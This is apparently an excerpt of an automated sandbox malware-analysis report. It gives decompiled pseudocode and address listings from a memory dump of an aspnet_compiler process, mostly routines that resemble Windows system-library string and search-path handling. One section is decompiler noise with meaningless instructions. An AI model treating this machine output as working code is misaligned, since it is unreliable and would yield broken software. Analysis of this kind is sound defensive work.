                          							__eflags = _t89 - 0x7fffffff;
                          							if(_t89 <= 0x7fffffff) {
                          								L16:
                          								 *(_t114 - 0x94) = _t109;
                          								__eflags = _t109;
                          								if(_t109 < 0) {
                          									__eflags = _t89;
                          									if(_t89 != 0) {
                          										 *_t103 = 0;
                          									}
                          									L26:
                          									 *(_t114 - 0xa0) = _t109;
                          									 *(_t114 - 4) = 0xfffffffe;
                          									__eflags = _t109;
                          									if(_t109 >= 0) {
                          										L31:
                          										_t98 = _t108;
                          										_t39 = _t98 + 1; // 0x1
                          										_t106 = _t39;
                          										do {
                          											_t69 =  *_t98;
                          											_t98 = _t98 + 1;
                          											__eflags = _t69;
                          										} while (_t69 != 0);
                          										_t99 = _t98 - _t106;
                          										__eflags = _t99;
                          										L34:
                          										_t70 =  *[fs:0x30];
                          										__eflags =  *((char*)(_t70 + 2));
                          										if( *((char*)(_t70 + 2)) != 0) {
                          											L40:
                          											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                          											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                          											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                          											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                          											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                          											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                          											 *(_t114 - 4) = 1;
                          											_push(_t114 - 0x74);
                          											L0144DEF0(_t99, _t106);
                          											 *(_t114 - 4) = 0xfffffffe;
                          											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                          											goto L3;
                          										}
                          										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                          										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                          											goto L40;
                          										}
                          										_push( *((intOrPtr*)(_t114 + 8)));
                          										_push( *((intOrPtr*)(_t114 - 0x9c)));
                          										_push(_t99 & 0x0000ffff);
                          										_push(_t108);
                          										_push(1);
                          										_t101 = E0143B280();
                          										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                          										if( *((char*)(_t114 + 0x14)) == 1) {
                          											__eflags = _t101 - 0x80000003;
                          											if(_t101 == 0x80000003) {
                          												E0143B7E0(1);
                          												_t101 = 0;
                          												__eflags = 0;
                          											}
                          										}
                          										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                          										goto L4;
                          									}
                          									__eflags = _t109 - 0x80000005;
                          									if(_t109 == 0x80000005) {
                          										continue;
                          									}
                          									break;
                          								}
                          								 *(_t114 - 0x90) = 0;
                          								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                          								_t91 = E0143E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                          								_t115 = _t115 + 0x10;
                          								_t104 = _t91;
                          								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                          								__eflags = _t104;
                          								if(_t104 < 0) {
                          									L21:
                          									_t109 = 0x80000005;
                          									 *(_t114 - 0x90) = 0x80000005;
                          									L22:
                          									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                          									L23:
                          									 *(_t114 - 0x94) = _t109;
                          									goto L26;
                          								}
                          								__eflags = _t104 - _t92;
                          								if(__eflags > 0) {
                          									goto L21;
                          								}
                          								if(__eflags == 0) {
                          									goto L22;
                          								}
                          								goto L23;
                          							}
                          							goto L15;
                          						}
                          					}
                          					__eflags = _t109;
                          					if(_t109 >= 0) {
                          						goto L31;
                          					}
                          					__eflags = _t109 - 0x80000005;
                          					if(_t109 != 0x80000005) {
                          						goto L31;
                          					}
                          					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                          					_t38 = _t95 - 1; // -129
                          					_t99 = _t38;
                          					goto L34;
                          				}
                          				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                          					__eflags = __edx - 0x65;
                          					if(__edx != 0x65) {
                          						goto L2;
                          					}
                          					goto L6;
                          				}
                          				L2:
                          				_push( *((intOrPtr*)(_t114 + 8)));
                          				_push(_t106);
                          				if(E0143A890() != 0) {
                          					goto L6;
                          				}
                          				goto L3;
                          			}






















                          0x013fb171
                          0x013fb171
                          0x013fb171
                          0x013fb171
                          0x013fb171
                          0x013fb176
                          0x013fb17b
                          0x013fb180
                          0x013fb186
                          0x013fb18f
                          0x013fb198
                          0x013fb1a4
                          0x013fb1aa
                          0x01454802
                          0x01454802
                          0x01454805
                          0x0145480c
                          0x0145480e
                          0x013fb1d1
                          0x013fb1d3
                          0x013fb1de
                          0x013fb1de
                          0x01454817
                          0x0145481e
                          0x01454820
                          0x01454822
                          0x01454822
                          0x01454824
                          0x01454824
                          0x0145482a
                          0x00000000
                          0x00000000
                          0x01454835
                          0x0145483a
                          0x0145483d
                          0x0145483f
                          0x01454842
                          0x01454842
                          0x01454842
                          0x01454846
                          0x0145484c
                          0x0145484e
                          0x01454851
                          0x01454851
                          0x01454853
                          0x01454854
                          0x01454854
                          0x01454858
                          0x0145485a
                          0x0145485a
                          0x0145485d
                          0x0145485f
                          0x01454861
                          0x01454861
                          0x01454866
                          0x0145486b
                          0x0145486e
                          0x01454871
                          0x01454876
                          0x01454876
                          0x01454878
                          0x0145487b
                          0x01454884
                          0x01454884
                          0x00000000
                          0x0145487d
                          0x0145487d
                          0x01454882
                          0x01454889
                          0x01454889
                          0x0145488f
                          0x01454891
                          0x014548e0
                          0x014548e2
                          0x014548e4
                          0x014548e4
                          0x014548e7
                          0x014548e7
                          0x014548ed
                          0x014548f4
                          0x014548f6
                          0x01454951
                          0x01454951
                          0x01454953
                          0x01454953
                          0x01454956
                          0x01454956
                          0x01454958
                          0x01454959
                          0x01454959
                          0x0145495d
                          0x0145495d
                          0x0145495f
                          0x0145495f
                          0x01454965
                          0x01454969
                          0x014549ba
                          0x014549ba
                          0x014549c1
                          0x014549c5
                          0x014549cc
                          0x014549d4
                          0x014549d7
                          0x014549da
                          0x014549e4
                          0x014549e5
                          0x014549f3
                          0x01454a02
                          0x00000000
                          0x01454a02
                          0x01454972
                          0x01454974
                          0x00000000
                          0x00000000
                          0x01454976
                          0x01454979
                          0x01454982
                          0x01454983
                          0x01454984
                          0x0145498b
                          0x0145498d
                          0x01454991
                          0x01454993
                          0x01454999
                          0x0145499d
                          0x014549a2
                          0x014549a2
                          0x014549a2
                          0x01454999
                          0x014549ac
                          0x00000000
                          0x014549b3
                          0x014548f8
                          0x014548fe
                          0x00000000
                          0x00000000
                          0x00000000
                          0x014548fe
                          0x01454895
                          0x0145489c
                          0x014548ad
                          0x014548b2
                          0x014548b5
                          0x014548b7
                          0x014548ba
                          0x014548bc
                          0x014548c6
                          0x014548c6
                          0x014548cb
                          0x014548d1
                          0x014548d4
                          0x014548d8
                          0x014548d8
                          0x00000000
                          0x014548d8
                          0x014548be
                          0x014548c0
                          0x00000000
                          0x00000000
                          0x014548c2
                          0x00000000
                          0x00000000
                          0x00000000
                          0x014548c4
                          0x00000000
                          0x01454882
                          0x0145487b
                          0x01454904
                          0x01454906
                          0x00000000
                          0x00000000
                          0x01454908
                          0x0145490e
                          0x00000000
                          0x00000000
                          0x01454910
                          0x01454917
                          0x01454917
                          0x00000000
                          0x01454917
                          0x013fb1ba
                          0x014547f9
                          0x014547fc
                          0x00000000
                          0x00000000
                          0x00000000
                          0x014547fc
                          0x013fb1c0
                          0x013fb1c0
                          0x013fb1c3
                          0x013fb1cb
                          0x00000000
                          0x00000000
                          0x00000000

                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID: _vswprintf_s
                          • String ID:
                          • API String ID: 677850445-0
                          • Opcode ID: 0b8425f46c3e75c036575fe12c0daf04e4d51e3cd8aa5dfbf0755c28a8dd362d
                          • Instruction ID: 3b899781bb8dadfb3a67ddc757e90dae1a4677ca1f8aad380058c11781d4339a
                          • Opcode Fuzzy Hash: 0b8425f46c3e75c036575fe12c0daf04e4d51e3cd8aa5dfbf0755c28a8dd362d
                          • Instruction Fuzzy Hash: 4151F175D002598FEB71CF78C845BAEBBB0AF04714F1841AEDC59AB3A2E7304985CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 84%
                          			E01422581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200382, char _a1546912062) {
                          				signed int _v8;
                          				signed int _v16;
                          				unsigned int _v24;
                          				void* _v28;
                          				signed int _v32;
                          				unsigned int _v36;
                          				signed int _v37;
                          				signed int _v40;
                          				signed int _v44;
                          				signed int _v48;
                          				signed int _v52;
                          				signed int _v56;
                          				intOrPtr _v60;
                          				signed int _v64;
                          				signed int _v68;
                          				signed int _v72;
                          				signed int _v76;
                          				signed int _v80;
                          				signed int _t243;
                          				signed int _t247;
                          				char* _t248;
                          				signed int _t252;
                          				signed int _t254;
                          				intOrPtr _t256;
                          				signed int _t259;
                          				signed int _t266;
                          				signed int _t269;
                          				signed int _t277;
                          				intOrPtr _t283;
                          				signed int _t285;
                          				signed int _t287;
                          				void* _t288;
                          				void* _t289;
                          				signed int _t290;
                          				unsigned int _t293;
                          				signed int _t297;
                          				void* _t298;
                          				signed int _t299;
                          				signed int _t303;
                          				intOrPtr* _t318;
                          				void* _t319;
                          				intOrPtr _t322;
                          				signed int _t331;
                          				signed int _t333;
                          				signed int _t334;
                          				signed int _t338;
                          				signed int _t339;
                          				intOrPtr* _t343;
                          				void* _t345;
                          				void* _t346;
                          				signed int _t347;
                          				signed int _t349;
                          				signed int _t352;
                          				void* _t353;
                          				void* _t355;
                          
                          				_t349 = _t352;
                          				_t353 = _t352 - 0x4c;
                          				_v8 =  *0x14ed360 ^ _t349;
                          				_push(__ebx);
                          				_push(__esi);
                          				_push(__edi);
                          				_t338 = 0x14eb2e8;
                          				_v56 = _a4;
                          				_v48 = __edx;
                          				_v60 = __ecx;
                          				_t293 = 0;
                          				_v80 = 0;
                          				asm("movsd");
                          				_v64 = 0;
                          				_v76 = 0;
                          				_v72 = 0;
                          				asm("movsd");
                          				_v44 = 0;
                          				_v52 = 0;
                          				_v68 = 0;
                          				asm("movsd");
                          				_v32 = 0;
                          				_v36 = 0;
                          				asm("movsd");
                          				_v16 = 0;
                          				_t283 = 0x48;
                          				_t313 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                          				_t331 = 0;
                          				_v37 = _t313;
                          				if(_v48 <= 0) {
                          					L16:
                          					_t45 = _t283 - 0x48; // 0x0
                          					__eflags = _t45 - 0xfffe;
                          					if(_t45 > 0xfffe) {
                          						_t339 = 0xc0000106;
                          						goto L32;
                          					} else {
                          						_t338 = L01414620(_t293,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t283);
                          						_v52 = _t338;
                          						__eflags = _t338;
                          						if(_t338 == 0) {
                          							_t339 = 0xc0000017;
                          							goto L32;
                          						} else {
                          							 *(_t338 + 0x44) =  *(_t338 + 0x44) & 0x00000000;
                          							_t50 = _t338 + 0x48; // 0x48
                          							_t333 = _t50;
                          							_t313 = _v32;
                          							 *((intOrPtr*)(_t338 + 0x3c)) = _t283;
                          							_t285 = 0;
                          							 *((short*)(_t338 + 0x30)) = _v48;
                          							__eflags = _t313;
                          							if(_t313 != 0) {
                          								 *(_t338 + 0x18) = _t333;
                          								__eflags = _t313 - 0x14e8478;
                          								 *_t338 = ((0 | _t313 == 0x014e8478) - 0x00000001 & 0xfffffffb) + 7;
                          								E0143F3E0(_t333,  *((intOrPtr*)(_t313 + 4)),  *_t313 & 0x0000ffff);
                          								_t313 = _v32;
                          								_t353 = _t353 + 0xc;
                          								_t285 = 1;
                          								__eflags = _a8;
                          								_t333 = _t333 + (( *_t313 & 0x0000ffff) >> 1) * 2;
                          								if(_a8 != 0) {
                          									_t277 = E014839F2(_t333);
                          									_t313 = _v32;
                          									_t333 = _t277;
                          								}
                          							}
                          							_t297 = 0;
                          							_v16 = 0;
                          							__eflags = _v48;
                          							if(_v48 <= 0) {
                          								L31:
                          								_t339 = _v68;
                          								__eflags = 0;
                          								 *((short*)(_t333 - 2)) = 0;
                          								goto L32;
                          							} else {
                          								_t287 = _t338 + _t285 * 4;
                          								_v56 = _t287;
                          								do {
                          									__eflags = _t313;
                          									if(_t313 != 0) {
                          										_t243 =  *(_v60 + _t297 * 4);
                          										__eflags = _t243;
                          										if(_t243 == 0) {
                          											goto L30;
                          										} else {
                          											__eflags = _t243 == 5;
                          											if(_t243 == 5) {
                          												goto L30;
                          											} else {
                          												goto L22;
                          											}
                          										}
                          									} else {
                          										L22:
                          										 *_t287 =  *(_v60 + _t297 * 4);
                          										 *(_t287 + 0x18) = _t333;
                          										_t247 =  *(_v60 + _t297 * 4);
                          										__eflags = _t247 - 8;
                          										if(_t247 > 8) {
                          											goto L56;
                          										} else {
                          											switch( *((intOrPtr*)(_t247 * 4 +  &M01422959))) {
                          												case 0:
                          													__ax =  *0x14e8488;
                          													__eflags = __ax;
                          													if(__ax == 0) {
                          														goto L29;
                          													} else {
                          														__ax & 0x0000ffff = E0143F3E0(__edi,  *0x14e848c, __ax & 0x0000ffff);
                          														__eax =  *0x14e8488 & 0x0000ffff;
                          														goto L26;
                          													}
                          													goto L108;
                          												case 1:
                          													L45:
                          													E0143F3E0(_t333, _v80, _v64);
                          													_t272 = _v64;
                          													goto L26;
                          												case 2:
                          													 *0x14e8480 & 0x0000ffff = E0143F3E0(__edi,  *0x14e8484,  *0x14e8480 & 0x0000ffff);
                          													__eax =  *0x14e8480 & 0x0000ffff;
                          													__eax = ( *0x14e8480 & 0x0000ffff) >> 1;
                          													__edi = __edi + __eax * 2;
                          													goto L28;
                          												case 3:
                          													__eax = _v44;
                          													__eflags = __eax;
                          													if(__eax == 0) {
                          														goto L29;
                          													} else {
                          														__esi = __eax + __eax;
                          														__eax = E0143F3E0(__edi, _v72, __esi);
                          														__edi = __edi + __esi;
                          														__esi = _v52;
                          														goto L27;
                          													}
                          													goto L108;
                          												case 4:
                          													_push(0x2e);
                          													_pop(__eax);
                          													 *(__esi + 0x44) = __edi;
                          													 *__edi = __ax;
                          													__edi = __edi + 4;
                          													_push(0x3b);
                          													_pop(__eax);
                          													 *(__edi - 2) = __ax;
                          													goto L29;
                          												case 5:
                          													__eflags = _v36;
                          													if(_v36 == 0) {
                          														goto L45;
                          													} else {
                          														E0143F3E0(_t333, _v76, _v36);
                          														_t272 = _v36;
                          													}
                          													L26:
                          													_t353 = _t353 + 0xc;
                          													_t333 = _t333 + (_t272 >> 1) * 2 + 2;
                          													__eflags = _t333;
                          													L27:
                          													_push(0x3b);
                          													_pop(_t274);
                          													 *((short*)(_t333 - 2)) = _t274;
                          													goto L28;
                          												case 6:
                          													__ebx = "\\Wow\\Wow";
                          													__eflags = __ebx - "\\Wow\\Wow";
                          													if(__ebx != "\\Wow\\Wow") {
                          														_push(0x3b);
                          														_pop(__esi);
                          														do {
                          															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                          															E0143F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                          															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                          															__edi = __edi + __eax * 2;
                          															__edi = __edi + 2;
                          															 *(__edi - 2) = __si;
                          															__ebx =  *__ebx;
                          															__eflags = __ebx - "\\Wow\\Wow";
                          														} while (__ebx != "\\Wow\\Wow");
                          														__esi = _v52;
                          														__ecx = _v16;
                          														__edx = _v32;
                          													}
                          													__ebx = _v56;
                          													goto L29;
                          												case 7:
                          													 *0x14e8478 & 0x0000ffff = E0143F3E0(__edi,  *0x14e847c,  *0x14e8478 & 0x0000ffff);
                          													__eax =  *0x14e8478 & 0x0000ffff;
                          													__eax = ( *0x14e8478 & 0x0000ffff) >> 1;
                          													__eflags = _a8;
                          													__edi = __edi + __eax * 2;
                          													if(_a8 != 0) {
                          														__ecx = __edi;
                          														__eax = E014839F2(__ecx);
                          														__edi = __eax;
                          													}
                          													goto L28;
                          												case 8:
                          													__eax = 0;
                          													 *(__edi - 2) = __ax;
                          													 *0x14e6e58 & 0x0000ffff = E0143F3E0(__edi,  *0x14e6e5c,  *0x14e6e58 & 0x0000ffff);
                          													 *(__esi + 0x38) = __edi;
                          													__eax =  *0x14e6e58 & 0x0000ffff;
                          													__eax = ( *0x14e6e58 & 0x0000ffff) >> 1;
                          													__edi = __edi + __eax * 2;
                          													__edi = __edi + 2;
                          													L28:
                          													_t297 = _v16;
                          													_t313 = _v32;
                          													L29:
                          													_t287 = _t287 + 4;
                          													__eflags = _t287;
                          													_v56 = _t287;
                          													goto L30;
                          											}
                          										}
                          									}
                          									goto L108;
                          									L30:
                          									_t297 = _t297 + 1;
                          									_v16 = _t297;
                          									__eflags = _t297 - _v48;
                          								} while (_t297 < _v48);
                          								goto L31;
                          							}
                          						}
                          					}
                          				} else {
                          					while(1) {
                          						L1:
                          						_t247 =  *(_v60 + _t331 * 4);
                          						if(_t247 > 8) {
                          							break;
                          						}
                          						switch( *((intOrPtr*)(_t247 * 4 +  &M01422935))) {
                          							case 0:
                          								__ax =  *0x14e8488;
                          								__eflags = __ax;
                          								if(__ax != 0) {
                          									__eax = __ax & 0x0000ffff;
                          									__ebx = __ebx + 2;
                          									__eflags = __ebx;
                          									goto L53;
                          								}
                          								goto L14;
                          							case 1:
                          								L44:
                          								_t313 =  &_v64;
                          								_v80 = E01422E3E(0,  &_v64);
                          								_t283 = _t283 + _v64 + 2;
                          								goto L13;
                          							case 2:
                          								__eax =  *0x14e8480 & 0x0000ffff;
                          								__ebx = __ebx + __eax;
                          								__eflags = __dl;
                          								if(__dl != 0) {
                          									__eax = 0x14e8480;
                          									goto L80;
                          								}
                          								goto L14;
                          							case 3:
                          								__eax = E0140EEF0(0x14e79a0);
                          								__eax =  &_v44;
                          								_push(__eax);
                          								_push(0);
                          								_push(0);
                          								_push(4);
                          								_push(L"PATH");
                          								_push(0);
                          								L57();
                          								__esi = __eax;
                          								_v68 = __esi;
                          								__eflags = __esi - 0xc0000023;
                          								if(__esi != 0xc0000023) {
                          									L10:
                          									__eax = E0140EB70(__ecx, 0x14e79a0);
                          									__eflags = __esi - 0xc0000100;
                          									if(__esi == 0xc0000100) {
                          										_v44 = _v44 & 0x00000000;
                          										__eax = 0;
                          										_v68 = 0;
                          										goto L13;
                          									} else {
                          										__eflags = __esi;
                          										if(__esi < 0) {
                          											L32:
                          											_t221 = _v72;
                          											__eflags = _t221;
                          											if(_t221 != 0) {
                          												L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t221);
                          											}
                          											_t222 = _v52;
                          											__eflags = _t222;
                          											if(_t222 != 0) {
                          												__eflags = _t339;
                          												if(_t339 < 0) {
                          													L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t222);
                          													_t222 = 0;
                          												}
                          											}
                          											goto L36;
                          										} else {
                          											__eax = _v44;
                          											__ebx = __ebx + __eax * 2;
                          											__ebx = __ebx + 2;
                          											__eflags = __ebx;
                          											L13:
                          											_t293 = _v36;
                          											goto L14;
                          										}
                          									}
                          								} else {
                          									__eax = _v44;
                          									__ecx =  *0x14e7b9c; // 0x0
                          									_v44 + _v44 =  *[fs:0x30];
                          									__ecx = __ecx + 0x180000;
                          									__eax = L01414620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                          									_v72 = __eax;
                          									__eflags = __eax;
                          									if(__eax == 0) {
                          										__eax = E0140EB70(__ecx, 0x14e79a0);
                          										__eax = _v52;
                          										L36:
                          										_pop(_t332);
                          										_pop(_t340);
                          										__eflags = _v8 ^ _t349;
                          										_pop(_t284);
                          										return E0143B640(_t222, _t284, _v8 ^ _t349, _t313, _t332, _t340);
                          									} else {
                          										__ecx =  &_v44;
                          										_push(__ecx);
                          										_push(_v44);
                          										_push(__eax);
                          										_push(4);
                          										_push(L"PATH");
                          										_push(0);
                          										L57();
                          										__esi = __eax;
                          										_v68 = __eax;
                          										goto L10;
                          									}
                          								}
                          								goto L108;
                          							case 4:
                          								__ebx = __ebx + 4;
                          								goto L14;
                          							case 5:
                          								_t279 = _v56;
                          								if(_v56 != 0) {
                          									_t313 =  &_v36;
                          									_t281 = E01422E3E(_t279,  &_v36);
                          									_t293 = _v36;
                          									_v76 = _t281;
                          								}
                          								if(_t293 == 0) {
                          									goto L44;
                          								} else {
                          									_t283 = _t283 + 2 + _t293;
                          								}
                          								goto L14;
                          							case 6:
                          								__eax =  *0x14e5764 & 0x0000ffff;
                          								goto L53;
                          							case 7:
                          								__eax =  *0x14e8478 & 0x0000ffff;
                          								__ebx = __ebx + __eax;
                          								__eflags = _a8;
                          								if(_a8 != 0) {
                          									__ebx = __ebx + 0x16;
                          									__ebx = __ebx + __eax;
                          								}
                          								__eflags = __dl;
                          								if(__dl != 0) {
                          									__eax = 0x14e8478;
                          									L80:
                          									_v32 = __eax;
                          								}
                          								goto L14;
                          							case 8:
                          								__eax =  *0x14e6e58 & 0x0000ffff;
                          								__eax = ( *0x14e6e58 & 0x0000ffff) + 2;
                          								L53:
                          								__ebx = __ebx + __eax;
                          								L14:
                          								_t331 = _t331 + 1;
                          								if(_t331 >= _v48) {
                          									goto L16;
                          								} else {
                          									_t313 = _v37;
                          									goto L1;
                          								}
                          								goto L108;
                          						}
                          					}
                          					L56:
                          					_t298 = 0x25;
                          					asm("int 0x29");
                          					asm("out 0x28, al");
                          					 *((intOrPtr*)(_t338 + 0x28)) =  *((intOrPtr*)(_t338 + 0x28)) + _t353;
                          					_t248 = _t247 + _t353;
                          					asm("daa");
                          					 *_t338 =  *_t338 + _t349;
                          					 *((intOrPtr*)(_t338 + 0x28)) =  *((intOrPtr*)(_t338 + 0x28)) + _t248;
                          					_t318 = _t313 + 5;
                          					 *0x1f014226 =  *0x1f014226 + _t248;
                          					_pop(_t288);
                          					 *((intOrPtr*)(_t248 +  &_a1530200382)) =  *((intOrPtr*)(_t248 +  &_a1530200382)) + _t318;
                          					 *_t318 =  *_t318 + _t248;
                          					 *((intOrPtr*)(_t318 + 1)) =  *((intOrPtr*)(_t318 + 1)) - _t248;
                          					 *_t248 =  *_t248 - 0x42;
                          					_t343 = _t338 + 2 + _t338 + 2;
                          					asm("daa");
                          					_t319 = _t318 + 1;
                          					 *_t343 =  *_t343 + _t288;
                          					 *((intOrPtr*)(_t319 + 1)) =  *((intOrPtr*)(_t319 + 1)) - _t248;
                          					 *((intOrPtr*)(_t319 + 1)) =  *((intOrPtr*)(_t319 + 1)) - _t248;
                          					asm("daa");
                          					_pop(_t289);
                          					_t345 = _t343 - 1 + 1;
                          					 *((intOrPtr*)(_t248 + _t288 +  &_a1546912062)) =  *((intOrPtr*)(_t248 + _t288 +  &_a1546912062)) + _t345;
                          					_t346 = _t345 + 1;
                          					_t355 = _t353 + _t298;
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					_push(0x20);
                          					_push(0x14cff00);
                          					E0144D08C(_t289, _t333, _t346);
                          					_v44 =  *[fs:0x18];
                          					_t334 = 0;
                          					 *_a24 = 0;
                          					_t290 = _a12;
                          					__eflags = _t290;
                          					if(_t290 == 0) {
                          						_t252 = 0xc0000100;
                          					} else {
                          						_v8 = 0;
                          						_t347 = 0xc0000100;
                          						_v52 = 0xc0000100;
                          						_t254 = 4;
                          						while(1) {
                          							_v40 = _t254;
                          							__eflags = _t254;
                          							if(_t254 == 0) {
                          								break;
                          							}
                          							_t303 = _t254 * 0xc;
                          							_v48 = _t303;
                          							__eflags = _t290 -  *((intOrPtr*)(_t303 + 0x13d1664));
                          							if(__eflags <= 0) {
                          								if(__eflags == 0) {
                          									_t269 = E0143E5C0(_a8,  *((intOrPtr*)(_t303 + 0x13d1668)), _t290);
                          									_t355 = _t355 + 0xc;
                          									__eflags = _t269;
                          									if(__eflags == 0) {
                          										_t347 = E014751BE(_t290,  *((intOrPtr*)(_v48 + 0x13d166c)), _a16, _t334, _t347, __eflags, _a20, _a24);
                          										_v52 = _t347;
                          										break;
                          									} else {
                          										_t254 = _v40;
                          										goto L62;
                          									}
                          									goto L70;
                          								} else {
                          									L62:
                          									_t254 = _t254 - 1;
                          									continue;
                          								}
                          							}
                          							break;
                          						}
                          						_v32 = _t347;
                          						__eflags = _t347;
                          						if(_t347 < 0) {
                          							__eflags = _t347 - 0xc0000100;
                          							if(_t347 == 0xc0000100) {
                          								_t299 = _a4;
                          								__eflags = _t299;
                          								if(_t299 != 0) {
                          									_v36 = _t299;
                          									__eflags =  *_t299 - _t334;
                          									if( *_t299 == _t334) {
                          										_t347 = 0xc0000100;
                          										goto L76;
                          									} else {
                          										_t322 =  *((intOrPtr*)(_v44 + 0x30));
                          										_t256 =  *((intOrPtr*)(_t322 + 0x10));
                          										__eflags =  *((intOrPtr*)(_t256 + 0x48)) - _t299;
                          										if( *((intOrPtr*)(_t256 + 0x48)) == _t299) {
                          											__eflags =  *(_t322 + 0x1c);
                          											if( *(_t322 + 0x1c) == 0) {
                          												L106:
                          												_t347 = E01422AE4( &_v36, _a8, _t290, _a16, _a20, _a24);
                          												_v32 = _t347;
                          												__eflags = _t347 - 0xc0000100;
                          												if(_t347 != 0xc0000100) {
                          													goto L69;
                          												} else {
                          													_t334 = 1;
                          													_t299 = _v36;
                          													goto L75;
                          												}
                          											} else {
                          												_t259 = E01406600( *(_t322 + 0x1c));
                          												__eflags = _t259;
                          												if(_t259 != 0) {
                          													goto L106;
                          												} else {
                          													_t299 = _a4;
                          													goto L75;
                          												}
                          											}
                          										} else {
                          											L75:
                          											_t347 = E01422C50(_t299, _a8, _t290, _a16, _a20, _a24, _t334);
                          											L76:
                          											_v32 = _t347;
                          											goto L69;
                          										}
                          									}
                          									goto L108;
                          								} else {
                          									E0140EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                          									_v8 = 1;
                          									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                          									_t347 = _a24;
                          									_t266 = E01422AE4( &_v36, _a8, _t290, _a16, _a20, _t347);
                          									_v32 = _t266;
                          									__eflags = _t266 - 0xc0000100;
                          									if(_t266 == 0xc0000100) {
                          										_v32 = E01422C50(_v36, _a8, _t290, _a16, _a20, _t347, 1);
                          									}
                          									_v8 = _t334;
                          									E01422ACB();
                          								}
                          							}
                          						}
                          						L69:
                          						_v8 = 0xfffffffe;
                          						_t252 = _t347;
                          					}
                          					L70:
                          					return E0144D0D1(_t252);
                          				}
                          				L108:
                          			}


























































                          0x01422584
                          0x01422586
                          0x01422590
                          0x01422596
                          0x01422597
                          0x01422598
                          0x01422599
                          0x0142259e
                          0x014225a4
                          0x014225a9
                          0x014225ac
                          0x014225ae
                          0x014225b1
                          0x014225b2
                          0x014225b5
                          0x014225b8
                          0x014225bb
                          0x014225bc
                          0x014225bf
                          0x014225c2
                          0x014225c5
                          0x014225c6
                          0x014225cb
                          0x014225ce
                          0x014225d8
                          0x014225dd
                          0x014225de
                          0x014225e1
                          0x014225e3
                          0x014225e9
                          0x014226da
                          0x014226da
                          0x014226dd
                          0x014226e2
                          0x01465b56
                          0x00000000
                          0x014226e8
                          0x014226f9
                          0x014226fb
                          0x014226fe
                          0x01422700
                          0x01465b60
                          0x00000000
                          0x01422706
                          0x01422706
                          0x0142270a
                          0x0142270a
                          0x0142270d
                          0x01422713
                          0x01422716
                          0x01422718
                          0x0142271c
                          0x0142271e
                          0x01465b6c
                          0x01465b6f
                          0x01465b7f
                          0x01465b89
                          0x01465b8e
                          0x01465b93
                          0x01465b96
                          0x01465b9c
                          0x01465ba0
                          0x01465ba3
                          0x01465bab
                          0x01465bb0
                          0x01465bb3
                          0x01465bb3
                          0x01465ba3
                          0x01422724
                          0x01422726
                          0x01422729
                          0x0142272c
                          0x0142279d
                          0x0142279d
                          0x014227a0
                          0x014227a2
                          0x00000000
                          0x0142272e
                          0x0142272e
                          0x01422731
                          0x01422734
                          0x01422734
                          0x01422736
                          0x01465bc1
                          0x01465bc1
                          0x01465bc4
                          0x00000000
                          0x01465bca
                          0x01465bca
                          0x01465bcd
                          0x00000000
                          0x01465bd3
                          0x00000000
                          0x01465bd3
                          0x01465bcd
                          0x0142273c
                          0x0142273c
                          0x01422742
                          0x01422747
                          0x0142274a
                          0x0142274d
                          0x01422750
                          0x00000000
                          0x01422756
                          0x01422756
                          0x00000000
                          0x01422902
                          0x01422908
                          0x0142290b
                          0x00000000
                          0x01422911
                          0x0142291c
                          0x01422921
                          0x00000000
                          0x01422921
                          0x00000000
                          0x00000000
                          0x01422880
                          0x01422887
                          0x0142288c
                          0x00000000
                          0x00000000
                          0x01422805
                          0x0142280a
                          0x01422814
                          0x01422816
                          0x00000000
                          0x00000000
                          0x0142281e
                          0x01422821
                          0x01422823
                          0x00000000
                          0x01422829
                          0x01422829
                          0x01422831
                          0x0142283c
                          0x0142283e
                          0x00000000
                          0x0142283e
